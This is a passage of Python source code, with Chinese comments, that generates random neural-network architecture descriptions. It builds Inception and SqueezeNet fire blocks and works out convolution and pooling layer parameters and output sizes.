output_size = self.get_output_size(params,1,last_layer_input_size)
params = last_layer_input_size + output_size + conv_params
self.layer_parameters += params #加入参数向量中
link_list=[self.layer_num - 1]
self.layer_link += self.get_link_vector(link_list,self.layer_num)
self.layer_id += [1] # 加入层id列表中
self.layer_num += 1
last_layer_input_size = output_size
#加入 Branch3 #5 BN
params = self.make_layer(16,last_layer_input_size)
self.layer_parameters += params #加入参数向量中
link_list=[self.layer_num - 1]
self.layer_link += self.get_link_vector(link_list,self.layer_num)
self.layer_id += [16] # 加入层id列表中
self.layer_num += 1
#加入 Branch3 #6 ReLU
length = last_layer_input_size[1]
for i in range(2,len(input_size)):
length *= input_size[i]
params = [1,length] + [0,0,1,0]
self.layer_parameters += params #加入参数向量中
link_list=[self.layer_num - 1]
self.layer_link += self.get_link_vector(link_list,self.layer_num)
self.layer_id += [22] # 加入层id列表中
self.layer_num += 1
branch3_res_index = self.layer_num - 1
#加入 Branch4 #1 pooling
pooling_params = [3,3, 1,1, 1,1, 1,1, 0]
params = input_size + [0,0,0,0] + pooling_params
output_size = self.get_output_size(params,7,input_size)
params = input_size + output_size + pooling_params
self.layer_parameters += params #加入参数向量中
link_list = [last_block_index]
self.layer_link += self.get_link_vector(link_list,self.layer_num)
self.layer_id += [7] # 加入层id列表中
self.layer_num += 1
last_layer_input_size = output_size
#加入 Branch4 #2 conv2d
in_channel = input_size[1]
conv_params = [in_channel,out_channel_4, 3,3, 1,1, 1,1, 1,1, 1]
params = last_layer_input_size + [0,0,0,0] + conv_params
output_size = self.get_output_size(params,1,last_layer_input_size)
params = last_layer_input_size + output_size + conv_params
self.layer_parameters += params #加入参数向量中
link_list=[self.layer_num - 1]
self.layer_link += self.get_link_vector(link_list,self.layer_num)
self.layer_id += [1] # 加入层id列表中
self.layer_num += 1
last_layer_input_size = output_size
#加入 Branch4 #3 BN
params = self.make_layer(16,last_layer_input_size)
self.layer_parameters += params #加入参数向量中
link_list=[self.layer_num - 1]
self.layer_link += self.get_link_vector(link_list,self.layer_num)
self.layer_id += [16] # 加入层id列表中
self.layer_num += 1
#加入 Branch4 #4 ReLU
length = last_layer_input_size[1]
for i in range(2,len(input_size)):
length *= input_size[i]
params = [1,length] + [0,0,1,0]
self.layer_parameters += params #加入参数向量中
link_list=[self.layer_num - 1]
self.layer_link += self.get_link_vector(link_list,self.layer_num)
self.layer_id += [22] # 加入层id列表中
self.layer_num += 1
branch4_res_index = self.layer_num - 1
final_out_channels = out_channel_1 + out_channel_2 + out_channel_3 + out_channel_4
output_size = [1,final_out_channels,last_layer_input_size[2],last_layer_input_size[3]]
#加入concat
layer_output_index_list = [branch1_res_index,branch2_res_index,branch3_res_index,branch4_res_index]
params = self.make_layer(23,output_size,out_channels=final_out_channels)
self.layer_parameters += params #加入参数向量中
self.layer_link += self.get_link_vector(layer_output_index_list,self.layer_num)
self.layer_id += [23] # 加入层id列表中
self.layer_num += 1
last_layer_input_size = output_size
#判断是否加入Pooling
in_height = input_size[2]
out_height = final_output_size[2]
if in_height == out_height:
#print('==make_inceptionV1_block',last_layer_input_size)
return self.layer_num - 1,last_layer_input_size
elif in_height == 2*out_height:
#加入Pooling
pooling_params = [3,3, 2,2, 1,1, 1,1, 0]
params = last_layer_input_size + [0,0,0,0] + pooling_params
output_size = self.get_output_size(params,7,last_layer_input_size)
params = last_layer_input_size + output_size + pooling_params
self.layer_parameters += params #加入参数向量中
link_list = [self.layer_num - 1]
self.layer_link += self.get_link_vector(link_list,self.layer_num)
self.layer_id += [7] # 加入层id列表中
self.layer_num += 1
last_layer_input_size = output_size
#print('2*make_inceptionV1_block',last_layer_input_size)
return self.layer_num - 1,last_layer_input_size
else:
print('Inception Wrong')
def make_squeeze_fire_block(self,last_block_index,input_size,final_output_size):
'''
加入suqueeze fire层
(8): Fire(
(squeeze): Sequential(
(0): Conv2d(256, 48, kernel_size=(1, 1), stride=(1, 1))
(1): ReLU(inplace=True)
)
(expand_1): Sequential(
(0): Conv2d(48, 192, kernel_size=(1, 1), stride=(1, 1))
(1): ReLU(inplace=True)
)
(expand_3): Sequential(
(0): Conv2d(48, 192, kernel_size=(3, 3), stride=(1, 1), padding=(1, 1))
(1): ReLU(inplace=True)
)
)
'''
in_channel = input_size[1]
squeeze_hidden_channel = self.prob_random([int(in_channel/4), int(in_channel/6), int(in_channel/8)],[0.05,0.2,0.75])
if squeeze_hidden_channel > 300:
squeeze_hidden_channel = self.prob_random([squeeze_hidden_channel,int(squeeze_hidden_channel/2),int(squeeze_hidden_channel/3)],[0.1,0.7,0.2])
expand_1_out_channel = squeeze_hidden_channel * 4
expand_2_out_channel = expand_1_out_channel
#加入 squeeze #1 conv2d
in_channel = input_size[1]
conv_params = [in_channel,squeeze_hidden_channel, 1,1, 1,1, 0,0, 1,1, 1]
params = input_size + [0,0,0,0] + conv_params
output_size = self.get_output_size(params,1,input_size)
params = input_size + output_size + conv_params
self.layer_parameters += params #加入参数向量中
link_list=[last_block_index]
self.layer_link += self.get_link_vector(link_list,self.layer_num)
self.layer_id += [1] # 加入层id列表中
self.layer_num += 1
last_layer_input_size = output_size
#加入 squeeze #2 ReLU
length = last_layer_input_size[1]
for i in range(2,len(input_size)):
length *= input_size[i]
params = [1,length] + [0,0,1,0]
self.layer_parameters += params #加入参数向量中
link_list=[self.layer_num - 1]
self.layer_link += self.get_link_vector(link_list,self.layer_num)
self.layer_id += [22] # 加入层id列表中
self.layer_num += 1
block_index = self.layer_num - 1
#加入 expand_1 #1 conv2d
in_channel = input_size[1]
conv_params = [squeeze_hidden_channel,expand_1_out_channel, 1,1, 1,1, 0,0, 1,1, 1]
params = input_size + [0,0,0,0] + conv_params
output_size = self.get_output_size(params,1,input_size)
params = input_size + output_size + conv_params
self.layer_parameters += params #加入参数向量中
link_list=[block_index]
self.layer_link += self.get_link_vector(link_list,self.layer_num)
self.layer_id += [1] # 加入层id列表中
self.layer_num += 1
last_layer_input_size = output_size
#加入 expand_1 #2 ReLU
length = last_layer_input_size[1]
for i in range(2,len(input_size)):
length *= input_size[i]
params = [1,length] + [0,0,1,0]
self.layer_parameters += params #加入参数向量中
link_list=[self.layer_num - 1]
self.layer_link += self.get_link_vector(link_list,self.layer_num)
self.layer_id += [22] # 加入层id列表中
self.layer_num += 1
branch1_res_index=self.layer_num - 1
#加入 expand_3 #1 conv2d
conv_params = [squeeze_hidden_channel,expand_2_out_channel, 3,3, 1,1, 1,1, 1,1, 1]
params = input_size + [0,0,0,0] + conv_params
output_size = self.get_output_size(params,1,input_size)
params = input_size + output_size + conv_params
self.layer_parameters += params #加入参数向量中
link_list=[block_index]
self.layer_link += self.get_link_vector(link_list,self.layer_num)
self.layer_id += [1] # 加入层id列表中
self.layer_num += 1
last_layer_input_size = output_size
#加入 expand_3 #2 ReLU
length = last_layer_input_size[1]
for i in range(2,len(input_size)):
length *= input_size[i]
params = [1,length] + [0,0,1,0]
self.layer_parameters += params #加入参数向量中
link_list=[self.layer_num - 1]
self.layer_link += self.get_link_vector(link_list,self.layer_num)
self.layer_id += [22] # 加入层id列表中
self.layer_num += 1
branch2_res_index=self.layer_num - 1
final_out_channels = expand_1_out_channel + expand_2_out_channel
output_size = [1,final_out_channels,last_layer_input_size[2],last_layer_input_size[3]]
#加入concat
layer_output_index_list = [branch1_res_index,branch2_res_index]
params = self.make_layer(23,output_size,out_channels=final_out_channels)
self.layer_parameters += params #加入参数向量中
self.layer_link += self.get_link_vector(layer_output_index_list,self.layer_num)
self.layer_id += [23] # 加入层id列表中
self.layer_num += 1
#print('fire',output_size)
return self.layer_num - 1,output_size
def get_output_size(self,parameters,layer_id,input_size):
if(layer_id == 0):
in_channels,out_channels,kernel_size,stride,padding,dilation,groups = parameters[-7:]
elif(layer_id == 1):
batch_size,channel,input_height,input_width = input_size
in_channels,out_channels,kernel_size_height,kernel_size_width,stride_height,stride_width,padding_height,padding_width,dilation_height,dilation_width,groups = parameters[-11:]
out_height = math.floor((input_height + 2*padding_height - dilation_height*(kernel_size_height-1) - 1)/(stride_height) + 1)
out_width = math.floor((input_width + 2*padding_width - dilation_width*(kernel_size_width-1) - 1)/(stride_width) + 1)
return [batch_size,out_channels,out_height,out_width]
elif(layer_id == 2):
in_channels,out_channels,kernel_size_depth,kernel_size_height,kernel_size_width,stride_depth,stride_height,stride_width,padding_depth,padding_height,padding_width,dilation_depth,dilation_width,dilation_height,groups = parameters[-15:]
elif(layer_id == 3):
in_channels,out_channels,kernel_size,stride,padding,output_padding,dilation,groups = parameters[-8:]
elif(layer_id == 4):
in_channels,out_channels,kernel_size_height,kernel_size_width,stride_height,stride_width,padding_height,padding_width,output_padding_height,output_padding_width,dilation,groups = parameters[-12:]
elif(layer_id == 5):
in_channels,out_channels,kernel_size_depth,kernel_size_height,kernel_size_width,stride_depth,stride_height,stride_width,padding_depth,\
padding_height,padding_width,output_padding_depth,output_padding_height,output_padding_width,dilation,groups = parameters[-16:]
elif(layer_id == 6):
kernel_size,stride,padding,dilation,pool_type = parameters[-5:]
elif(layer_id == 7):
batch_size,channel,input_height,input_width = input_size
kernel_size_height,kernel_size_width,stride_height,stride_width,padding_height,padding_width,dilation_height,dilation_width,pool_type = parameters[-9:]
out_height = math.floor((input_height + 2*padding_height - dilation_height*(kernel_size_height-1) - 1)/(stride_height) + 1)
out_width = math.floor((input_width + 2*padding_width - dilation_width*(kernel_size_width-1) - 1)/(stride_width) + 1)
return [batch_size,channel,out_height,out_width]
elif(layer_id == 8):
kernel_size_depth,kernel_size_height,kernel_size_width,stride_depth,stride_height,stride_width,padding_depth,padding_height,padding_width,dilation_depth,dilation_height,dilation_width,pool_type = parameters[-13:]
elif(layer_id == 9):
kernel_size,stride,padding = parameters[-3:]
elif(layer_id == 10):
kernel_size_height,kernel_size_width,stride_height,stride_width,padding_height,padding_width = parameters[-6:]
elif(layer_id == 11):
kernel_size_depth,kernel_size_height,kernel_size_width,stride_depth,stride_height,stride_width,padding_depth,padding_height,padding_width = parameters[-9:]
elif(layer_id == 12):
output_size_L,pool_type = parameters[-2:]
elif(layer_id == 13):
output_size_H,output_size_W,pool_type = parameters[-3:]
elif(layer_id == 14):
output_size_D,output_size_H,output_size_W,pool_type = parameters[-4:]
elif(layer_id == 15):
num_features = parameters[-1:][0]
elif(layer_id == 16):
num_features = parameters[-1:][0]
elif(layer_id == 17):
num_features = parameters[-1:][0]
elif(layer_id == 18):
probability = parameters[-1:][0]
elif(layer_id == 19):
probability = parameters[-1:][0]
elif(layer_id == 20):
probability = parameters[-1:][0]
elif(layer_id == 21):
batch_size = input_size[0]
input_length,output_length = parameters[-2:]
return [batch_size,input_length,batch_size,output_length]
elif(layer_id == 22):
sigmoid,tanh,ReLU,leaky_ReLU = parameters[-4:]
elif(layer_id == 23):
return input_size
elif(layer_id == 24):
return input_size
elif(layer_id == 25):
probability = parameters[-1:][0]
elif(layer_id == 26):
probability = parameters[-1:][0]
def make_layer(self,layer_id,input_size,output_size=None,add_num=None,out_channels=None,target_params=None):
# print(layer_id,input_size,output_size)
'''
layer_id:神经网络层的id
input_size: list
返回参数向量
'''
# print(layer_id,input_size,output_size)
if(layer_id == 0):
# print("make conv2d...")
#现在写的是kernel_size是正方形或者立方体
input_length = input_size[2]
in_channels,out_channels,kernel_size,stride_size,padding_size,dilation_size,groups = [0 for index in range(7)]
in_channels = input_size[1]
# print(in_channels,'in_channels start')
if(output_size==None):
if(in_channels <= 3):
out_channels = random.randint(32,64)
else:
out_channels = random.randint(int(in_channels*2),in_channels*3)
output_size = [0,0,0]
output_size = [input_size[0],out_channels,input_length]
else:
out_channels = output_size[1]
#生成宽高一样的kernel
kernel_size = self.prob_random([1,2,3,4,5,6,7],[0.05,0.05,0.4,0.05,0.3,0.05,0.1])
#生成宽高一样的dilation
dilation_size = self.prob_random([1,2],[0.95,0.05])
common_divisor = self.get_common_divisor(in_channels,out_channels)
if(len(common_divisor) == 1):
#只有公约数1
groups = 1
else:
groups = self.prob_random(common_divisor,[0.95]+[(1-0.95)/(len(common_divisor)-1) for i in range(len(common_divisor)-1)])
#生成stride,padding
if(output_size==None):
stride_size = 1
padding_size = random.randint(0,kernel_size)
#计算output_size
out_length = (input_length + 2*padding_size - dilation_size*(kernel_size-1) - 1)/(stride_size) + 1
output_size = [input_size[0],out_channels,out_length]
else:
#通过已知的kernel_size,dilation_size计算stride_size,padding_size的整数解
out_length = output_size[2]
in_length = input_size[2]
find = False
find_count = 0
while not find:
find_count += 1
assert find_count < 200, "疑似找不到符合要求的神经网络层"
for p in range(0,int(kernel_size/2)+1):
stride_size = (in_length + 2*p - dilation_size*(kernel_size-1) - 1)/(out_length - 1)
if(stride_size.is_integer() and stride_size > 0):
padding_size = p
find = True
break
else:
kernel_size = self.prob_random([1,2,3,4,5,6,7],[1/7 for i in range(7)])
# print(in_channels,'in_channels')
return [int(i) for i in input_size+output_size+[in_channels,out_channels,kernel_size,stride_size,padding_size,dilation_size,groups]]
elif(layer_id == 1):
# print('1conv2d',input_size,output_size)
low_channel_prob = 0.5
# print("make conv2d...")
#现在写的是kernel_size是正方形或者立方体
input_height = input_size[2]
input_width = input_size[3]
in_channels,out_channels,kernel_size_height,kernel_size_width,stride_height,stride_width,padding_height,padding_width,dilation_height,dilation_width,groups = [0 for index in range(11)]
in_channels = input_size[1]
# print(in_channels,'in_channels start')
if(output_size==None):
if(in_channels <= 3):
out_channels = random.randint(32,64)
else:
# print(int(in_channels/0.8),int(in_channels*1.2))
out_channels = random.randint(int(in_channels*0.8),int(in_channels*1.2))
if self.large == 1 and out_channels > 600:
out_channels = self.prob_random([int(out_channels/6),int(out_channels/5),int(out_channels/4)],[0.3,0.5,0.2])
elif self.large == 0 and out_channels > 200:
out_channels = self.prob_random([int(out_channels/6),int(out_channels/5),int(out_channels/4)],[0.3,0.5,0.2])
output_size = [0,0,0,0]
output_size = [input_size[0],out_channels,input_height,input_width]
else:
out_channels = output_size[1]
#生成宽高一样的kernel
# print('2conv2d',input_size,output_size)
kernel_size = self.prob_random([1,2,3,4,5,6,7],[0.78,0.05,0.1,0.04,0.01,0.01,0.01])
kernel_size_height,kernel_size_width = kernel_size,kernel_size
#生成宽高一样的dilation
dilation_size = self.prob_random([1,2],[0.95,0.05])
dilation_height,dilation_width = dilation_size,dilation_size
common_divisor = self.get_common_divisor(in_channels,out_channels)
if(len(common_divisor) == 1):
#只有公约数1
groups = 1
else:
groups = self.prob_random(common_divisor,[0.95]+[(1-0.95)/(len(common_divisor)-1) for i in range(len(common_divisor)-1)])
#生成stride,padding
if(output_size==None):
stride_size = 1
stride_height,stride_width = stride_size,stride_size
padding_size = random.randint(0,kernel_size)
padding_height,padding_width = padding_size,padding_size
#计算output_size
out_height = math.floor((input_height + 2*padding_height - dilation_height*(kernel_size_height-1) - 1)/(stride_height) + 1)
out_width = math.floor((input_width + 2*padding_width - dilation_width*(kernel_size_width-1) - 1)/(stride_width) + 1)
output_size = [input_size[0],out_channels,out_height,out_width]
else:
#通过已知的kernel_size,dilation_size计算stride_size,padding_size的整数解
out_height = output_size[2]
in_height = input_size[2]
find = False
find_count = 0
while not find:
find_count += 1
assert find_count < 200, "疑似找不到符合要求的神经网络层"
for p in range(0,int(kernel_size/2)+1):
stride_size = (in_height + 2*p - dilation_size*(kernel_size-1) - 1)/(out_height - 1)
if(stride_size.is_integer() and stride_size > 0):
padding_size = p
padding_height,padding_width = padding_size,padding_size
stride_height,stride_width = stride_size,stride_size
find = True
break
else:
kernel_size = self.prob_random([1,2,3,4,5,6,7],[1/7 for i in range(7)])
kernel_size_height,kernel_size_width = kernel_size,kernel_size
# print(in_channels,'in_channels')
return [int(i) for i in input_size+output_size+[in_channels,out_channels,kernel_size_height,kernel_size_width,stride_height,stride_width,padding_height,padding_width,dilation_height,dilation_width,groups]]
elif(layer_id == 2):
# print("make conv2d...")
#现在写的是kernel_size是正方形或者立方体
input_depth = input_size[2]
input_height = input_size[3]
input_width = input_size[4]
in_channels,out_channels,kernel_size_depth,kernel_size_height,kernel_size_width,stride_depth,\
stride_height,stride_width,padding_depth,padding_height,padding_width,dilation_depth,dilation_width,dilation_height,\
groups = [0 for index in range(15)]
in_channels = input_size[1]
# print(in_channels,'in_channels start')
if(output_size==None):
if(in_channels <= 3):
out_channels = random.randint(32,64)
else:
out_channels = random.randint(int(in_channels*2),in_channels*3)
output_size = [0,0,0,0,0]
output_size = [input_size[0],out_channels,input_depth,input_height,input_width]
else:
out_channels = output_size[1]
#生成宽高一样的kernel
kernel_size = self.prob_random([1,2,3,4,5,6,7],[0.05,0.05,0.4,0.05,0.3,0.05,0.1])
kernel_size_depth,kernel_size_height,kernel_size_width = kernel_size,kernel_size,kernel_size
#生成宽高一样的dilation
dilation_size = self.prob_random([1,2],[0.95,0.05])
dilation_depth,dilation_height,dilation_width = dilation_size,dilation_size,dilation_size
common_divisor = self.get_common_divisor(in_channels,out_channels)
if(len(common_divisor) == 1):
#只有公约数1
groups = 1
else:
groups = self.prob_random(common_divisor,[0.95]+[(1-0.95)/(len(common_divisor)-1) for i in range(len(common_divisor)-1)])
# print('in_channels,out_channels,common_divisor',in_channels,out_channels,common_divisor)
#生成stride,padding
if(output_size==None):
stride_size = 1
stride_depth,stride_height,stride_width = stride_size,stride_size,stride_size
padding_size = random.randint(0,kernel_size)
padding_depth,padding_height,padding_width = padding_size,padding_size,padding_size
#计算output_size
out_depth = (input_depth + 2*padding_depth - dilation_depth*(kernel_size_depth-1) - 1)/(stride_depth) + 1
out_height = (input_height + 2*padding_height - dilation_height*(kernel_size_height-1) - 1)/(stride_height) + 1
out_width = (input_width + 2*padding_width - dilation_width*(kernel_size_width-1) - 1)/(stride_width) + 1
output_size = [input_size[0],out_channels,out_depth,out_height,out_width]
else:
#通过已知的kernel_size,dilation_size计算stride_size,padding_size的整数解
#先寻找height width
out_height = output_size[3]
in_height = input_size[3]
find = False
find_count = 0
while not find:
find_count += 1
assert find_count < 200, "疑似找不到符合要求的神经网络层"
for p in range(0,int(kernel_size/2)+1):
stride_size = (in_height + 2*p - dilation_size*(kernel_size-1) - 1)/(out_height - 1)
if(stride_size.is_integer() and stride_size > 0):
padding_size = p
padding_height,padding_width = padding_size,padding_size
stride_height,stride_width = stride_size,stride_size
find = True
break
else:
kernel_size = self.prob_random([1,2,3,4,5,6,7],[1/7 for i in range(7)])
kernel_size_height,kernel_size_width = kernel_size,kernel_size
out_depth = output_size[2]
in_depth = input_size[2]
find = False
find_count = 0
while not find:
find_count += 1
assert find_count < 200, "疑似找不到符合要求的神经网络层"
for p in range(0,int(kernel_size/2)+1):
stride_size = (in_depth + 2*p - dilation_size*(kernel_size-1) - 1)/(out_depth - 1)
if(stride_size.is_integer() and stride_size > 0):
padding_size = p
padding_depth = padding_size
stride_depth = stride_size
find = True
break
else:
kernel_size = self.prob_random([1,2,3,4,5,6,7],[1/7 for i in range(7)])
kernel_size_depth = kernel_size
# print(in_channels,'in_channels')
return [int(i) for i in input_size+output_size+[in_channels,out_channels,kernel_size_depth,kernel_size_height,kernel_size_width,stride_depth,stride_height,stride_width,padding_depth,padding_height,padding_width,dilation_depth,dilation_width,dilation_height,groups]]
elif(layer_id == 3):
# print(output_size,'output_size')
assert output_size==None,"反卷积层只支持不指定输出大小"
input_length = input_size[2]
in_channels,out_channels,kernel_size,stride,padding,output_padding,dilation,groups = [0 for index in range(8)]
in_channels = input_size[1]
if(output_size==None):
if(in_channels <= 3):
out_channels = random.randint(16,64)
else:
out_channels = random.randint(int(in_channels*2),in_channels*3)
output_size = [0,0,0,0]
output_size = [input_size[0],out_channels,input_length]
#生成宽高一样的kernel
kernel_size = self.prob_random([1,2,3,4,5,6,7],[0.05,0.05,0.4,0.05,0.3,0.05,0.1])
#生成宽高一样的dilation
dilation_size = self.prob_random([1,2],[0.95,0.05])
common_divisor = self.get_common_divisor(in_channels,out_channels)
output_padding_size = 0
if(len(common_divisor) == 1):
#只有公约数1
groups = 1
else:
groups = self.prob_random(common_divisor,[0.95]+[(1-0.95)/(len(common_divisor)-1) for i in range(len(common_divisor)-1)])
#生成stride,padding
if(True):
stride_size = 1
padding_size = random.randint(0,kernel_size)
ouput_length = output_padding_size + stride_size*(input_length - 1) - 2*padding_size + dilation_size*(kernel_size - 1) + 1
#计算output_size
output_size = [input_size[0],out_channels,ouput_length]
# print([int(i) for i in input_size+output_size+[in_channels,out_channels,kernel_size,stride,padding,output_padding,dilation,groups]])
return [int(i) for i in input_size+output_size+[in_channels,out_channels,kernel_size,stride_size,padding,output_padding,dilation_size,groups]]
elif(layer_id == 4):
#由于size无法成倍缩小,暂时只支持output_size = None
# print(output_size,'output_size')
assert output_size==None,"反卷积层只支持不指定输出大小"
input_height = input_size[2]
input_width = input_size[3]
in_channels,out_channels,kernel_size_height,kernel_size_width,stride_height,\
stride_width,padding_height,padding_width,dilation,groups,output_padding_height,output_padding_width = [0 for index in range(12)]
in_channels = input_size[1]
if(output_size==None):
if(in_channels <= 3):
out_channels = random.randint(16,64)
else:
out_channels = random.randint(int(in_channels*2),in_channels*3)
output_size = [0,0,0,0]
output_size = [input_size[0],out_channels,input_height,input_width]
#生成宽高一样的kernel
kernel_size = self.prob_random([1,2,3,4,5,6,7],[0.05,0.05,0.4,0.05,0.3,0.05,0.1])
kernel_size_height,kernel_size_width = kernel_size,kernel_size
#生成宽高一样的dilation
dilation_size = self.prob_random([1,2],[0.95,0.05])
common_divisor = self.get_common_divisor(in_channels,out_channels)
output_padding_height = 0
output_padding_width = 0
if(len(common_divisor) == 1):
#只有公约数1
groups = 1
else:
groups = self.prob_random(common_divisor,[0.95]+[(1-0.95)/(len(common_divisor)-1) for i in range(len(common_divisor)-1)])
#生成stride,padding
if(True):
stride_size = 1
stride_height,stride_width = stride_size,stride_size
padding_size = random.randint(0,kernel_size)
padding_height,padding_width = padding_size,padding_size
ouput_height = output_padding_height + stride_height*(input_height - 1) - 2*padding_height + dilation_size*(kernel_size_height - 1) + 1
ouput_width = output_padding_width + stride_width*(input_width - 1) - 2*padding_width + dilation_size*(kernel_size_width - 1) + 1
# output_padding_height = ouput_height - stride_height*(input_height - 1) + 2*padding_height - dilation_size*(kernel_size_height - 1) - 1
# output_padding_width = ouput_width - stride_width*(input_width - 1) + 2*padding_width - dilation_size*(kernel_size_width - 1) - 1
#计算output_size
output_size = [input_size[0],out_channels,ouput_height,ouput_width]
# print([int(i) for i in input_size+output_size+[in_channels,out_channels,kernel_size_height,kernel_size_width,stride_height,stride_width,padding_height,padding_width,output_padding_height,output_padding_width,dilation_size,groups]])
return [int(i) for i in input_size+output_size+[in_channels,out_channels,kernel_size_height,kernel_size_width,stride_height,stride_width,padding_height,padding_width,output_padding_height,output_padding_width,dilation_size,groups]]
# return nn.ConvTranspose2d(in_channels,out_channels,(kernel_size_height, kernel_size_width), stride=(stride_height, stride_width),\
# padding=(padding_height, padding_width),output_padding=(output_padding_height,output_padding_width),dilation=dilation,groups=groups)
elif(layer_id == 5):
# print(output_size,'output_size')
assert output_size==None,"反卷积层只支持不指定输出大小"
input_depth = input_size[2]
input_height = input_size[3]
input_width = input_size[4]
in_channels,out_channels,kernel_size_depth,kernel_size_height,kernel_size_width,stride_depth,\
stride_height,stride_width,padding_depth,padding_height,padding_width,output_padding_depth,output_padding_height,output_padding_width,\
dilation,groups = [0 for index in range(16)]
in_channels = input_size[1]
if(output_size==None):
if(in_channels <= 3):
out_channels = random.randint(16,64)
else:
out_channels = random.randint(int(in_channels*2),in_channels*3)
output_size = [0,0,0,0]
output_size = [input_size[0],out_channels,input_depth,input_height,input_width]
#生成宽高一样的kernel
kernel_size = self.prob_random([1,2,3,4,5,6,7],[0.05,0.05,0.4,0.05,0.3,0.05,0.1])
kernel_size_depth,kernel_size_height,kernel_size_width = kernel_size,kernel_size,kernel_size
#生成宽高一样的dilation
dilation_size = self.prob_random([1,2],[0.95,0.05])
common_divisor = self.get_common_divisor(in_channels,out_channels)
output_padding_height = 0
output_padding_width = 0
output_padding_depth = 0
if(len(common_divisor) == 1):
#只有公约数1
groups = 1
else:
groups = self.prob_random(common_divisor,[0.95]+[(1-0.95)/(len(common_divisor)-1) for i in range(len(common_divisor)-1)])
#生成stride,padding
if(True):
stride_size = 1
stride_height,stride_width,stride_depth = stride_size,stride_size,stride_size
padding_size = random.randint(0,kernel_size)
padding_depth,padding_height,padding_width = padding_size,padding_size,padding_size
ouput_depth = output_padding_depth + stride_depth*(input_depth - 1) - 2*padding_depth + dilation_size*(kernel_size_depth - 1) + 1
ouput_height = output_padding_height + stride_height*(input_height - 1) - 2*padding_height + dilation_size*(kernel_size_height - 1) + 1
ouput_width = output_padding_width + stride_width*(input_width - 1) - 2*padding_width + dilation_size*(kernel_size_width - 1) + 1
# output_padding_height = ouput_height - stride_height*(input_height - 1) + 2*padding_height - dilation_size*(kernel_size_height - 1) - 1
# output_padding_width = ouput_width - stride_width*(input_width - 1) + 2*padding_width - dilation_size*(kernel_size_width - 1) - 1
#计算output_size
output_size = [input_size[0],out_channels,ouput_depth,ouput_height,ouput_width]
# print([int(i) for i in input_size+output_size+[in_channels,out_channels,kernel_size_depth,kernel_size_height,kernel_size_width,stride_depth,\
# stride_height,stride_width,padding_depth,padding_height,padding_width,output_padding_depth,output_padding_height,output_padding_width,\
# dilation_size,groups]])
return [int(i) for i in input_size+output_size+[in_channels,out_channels,kernel_size_depth,kernel_size_height,kernel_size_width,stride_depth,\
stride_height,stride_width,padding_depth,padding_height,padding_width,output_padding_depth,output_padding_height,output_padding_width,\
dilation_size,groups]]
# return nn.ConvTranspose3d(in_channels,out_channels,(kernel_size_depth, kernel_size_height, kernel_size_width), stride=(stride_depth, stride_height, stride_width),\
# padding=(padding_depth, padding_height, padding_width),output_padding=(output_padding_depth, output_padding_height, output_padding_width),dilation=dilation,groups=groups)
elif(layer_id == 6):
#如果是max pooling则需要返回indices
input_length = input_size[2]
input_channels = input_size[1]
kernel_size,stride_size,padding_size,dilation_size,pool_type = [0 for index in range(5)]
pool_type = random.randint(0,1)
kernel_size = self.prob_random([1,2,3,4,5,6,7],[0.05,0.05,0.4,0.05,0.3,0.05,0.1])
#生成宽高一样的dilation
dilation_size = self.prob_random([1,2],[0.95,0.05])
if(pool_type == 1):
dilation_size = 1
if(output_size==None):
# stride_size = self.prob_random([1,2,3],[0.6,0.3,0.1])
stride_size = 1
padding_size = random.randint(0,kernel_size)
#计算output_size
out_length = (input_length + 2*padding_size - dilation_size*(kernel_size-1) - 1)/(stride_size) + 1
output_size = [input_size[0],input_channels,out_length]
else:
#通过已知的kernel_size,dilation_size计算stride_size,padding_size的整数解
out_length = output_size[2]
input_length = input_size[2]
find = False
find_count = 0
while not find:
find_count += 1
# print(kernel_size)
assert find_count < 30, "疑似找不到符合要求的神经网络层"
for p in range(0,int(kernel_size/2)+1):
stride_size = (input_length + 2*p - dilation_size*(kernel_size-1) - 1)/(out_length - 1)
if(stride_size.is_integer() and stride_size > 0):
padding_size = p
find = True
break
else:
kernel_size = self.prob_random([1,2,3,4,5,6,7],[1/7 for i in range(7)])
return [int(i) for i in input_size+output_size+[kernel_size,stride_size,padding_size,dilation_size,pool_type]]
elif(layer_id == 7):
#如果是max pooling则需要返回indices
input_height = input_size[2]
input_width = input_size[3]
input_channels = input_size[1]
kernel_size_height,kernel_size_width,stride_height,stride_width,padding_height,padding_width,dilation_height,dilation_width,pool_type = [0 for index in range(9)]
pool_type = random.randint(0,1)
kernel_size = self.prob_random([1,2,3,4,5,6,7],[0.05,0.05,0.4,0.05,0.3,0.05,0.1])
kernel_size_height,kernel_size_width = kernel_size,kernel_size
#生成宽高一样的dilation
dilation_size = self.prob_random([1,2],[0.95,0.05])
dilation_height,dilation_width = dilation_size,dilation_size
if(pool_type == 1):
dilation_height,dilation_width = 1,1
if(output_size==None):
# stride_size = self.prob_random([1,2,3],[0.6,0.3,0.1])
stride_size = 1
stride_height,stride_width = stride_size,stride_size
padding_size = 0
padding_height,padding_width = padding_size,padding_size
#计算output_size
out_height = math.floor((input_height + 2*padding_height - dilation_height*(kernel_size_height-1) - 1)/(stride_height) + 1)
out_width = math.floor((input_width + 2*padding_width - dilation_width*(kernel_size_width-1) - 1)/(stride_width) + 1)
output_size = [input_size[0],input_channels,out_height,out_width]
else:
#通过已知的kernel_size,dilation_size计算stride_size,padding_size的整数解
out_height = output_size[2]
in_height = input_size[2]
find = False
find_count = 0
while not find:
find_count += 1
# print(kernel_size)
assert find_count < 30, "疑似找不到符合要求的神经网络层"
for p in range(0,int(kernel_size/2)+1):
stride_size = (in_height + 2*p - dilation_size*(kernel_size-1) - 1)/(out_height - 1)
if(stride_size.is_integer() and stride_size > 0):
padding_size = p
padding_height,padding_width = padding_size,padding_size
stride_height,stride_width = stride_size,stride_size
find = True
break
else:
kernel_size = self.prob_random([1,2,3,4,5,6,7],[1/7 for i in range(7)])
kernel_size_height,kernel_size_width = kernel_size,kernel_size
return [int(i) for i in input_size+output_size+[kernel_size_height,kernel_size_width,stride_height,stride_width,padding_height,padding_width,dilation_height,dilation_width,pool_type]]
elif(layer_id == 8):
#如果是max pooling则需要返回indices
input_depth = input_size[2]
input_height = input_size[3]
input_width = input_size[4]
input_channels = input_size[1]
kernel_size_depth,kernel_size_height,kernel_size_width,stride_depth,stride_height,\
stride_width,padding_depth,padding_height,padding_width,dilation_depth,dilation_height,dilation_width,pool_type = [0 for index in range(13)]
pool_type = random.randint(0,1)
kernel_size = self.prob_random([1,2,3,4,5,6,7],[0.05,0.05,0.4,0.05,0.3,0.05,0.1])
kernel_size_depth,kernel_size_height,kernel_size_width = kernel_size,kernel_size,kernel_size
#生成宽高一样的dilation
dilation_size = self.prob_random([1,2],[0.95,0.05])
